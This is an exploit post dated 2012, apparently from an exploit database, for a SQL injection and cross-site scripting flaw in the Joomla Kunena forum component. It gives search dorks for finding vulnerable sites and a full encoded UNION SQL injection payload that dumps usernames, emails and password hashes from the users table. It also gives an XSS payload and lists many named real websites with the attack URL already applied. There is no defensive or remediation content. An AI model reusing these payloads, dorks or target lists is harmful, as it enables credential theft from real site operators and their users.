
Joomla Kunena SQL Injection / Cross Site Scripting

Posted on 22 October 2012

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 ========================================== 1 0 I'm Taurus Omar Member From Inj3ct0r TEAM 1 1 ========================================== 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 | | | Joomla com_kunena - SQL Injection Vulnerability / Cross-Site Scripting | -------------------------------------------------------------------------- +----------------| ABOUT ME |--------------------+ NAME: TAURUS OMAR - HOME: ACCESOILEGAL.BLOGSPOT.COM - TWITTER: @taurusomar_ - E-MAIL: omar-taurus[at]dragonsecurity[dot]org - E-MAIL: omar-taurus[at]live[dot]com - PWNED: #ZUUU - +------------------------------------------------+ # Exploit Title: Joomla com_kunena - SQL Injection Vulnerability / Cross-Site Scripting # Vendor Name: Kunena # Url Vendor: http://www.kunena.org/ # Category: WebApps # Type: php # Risk: Critical # Dork: intext:"Powered by Kunena" com_kunena func= # Dork: inurl:index.php?option=com_kunena& # Dork: intext:"Gracias a Kunena" com_kunena func= # Info: This Vulnerability Affects About 70 million Web's # Exmaple/Sql=> http://site/index.php?option=com_kunena&func=userlist&search= [ Sql ] # Example/Xss=> http://site/index.php?option=com_kunena&func=userlist&search= [ Xss ] # Exploit/Comand/Sql=> 
%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20; # Exploit/Comand/Xss=> "><img src=x onerror=;;alert('1337') /> # Exmaple/Time_Real http://www.nakhonbanguns.com/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20; http://www.becasuniversitarias.unt.edu.ar/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20; http://www.agft.org/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20; http://www.oui-iohe.org/webcolam/rifge/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20; 
http://www.newgalleryfitness.com/portal/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20; http://www.ratobato.com/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20; http://racdelta.org/web/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20; # Sample/Sql/Xss/Vulnerabirility http://racdelta.org/web/index.php?option=com_kunena&func=userlist&search=%' http://pureos.org/index.php?option=com_kunena&func=userlist&search=%' http://www.twinmos.com/index.php?option=com_kunena&func=userlist&search=%' http://www.vagturbo.cl/index.php?option=com_kunena&func=userlist&search=%' http://www.ratobato.com/index.php?option=com_kunena&func=userlist&search=%' http://www.agft.org/index.php?option=com_kunena&func=userlist&search=%' http://www.newgalleryfitness.com/portal/index.php?option=com_kunena&func=userlist&search=%' http://www.nakhonbanguns.com/index.php?option=com_kunena&func=userlist&search=%' http://www.becasuniversitarias.unt.edu.ar/index.php?option=com_kunena&func=userlist&search=%' http://www.deandroid.com.ar/index.php?option=com_kunena&func=userlist&search=%' # Many 
More in Google & Bing

 
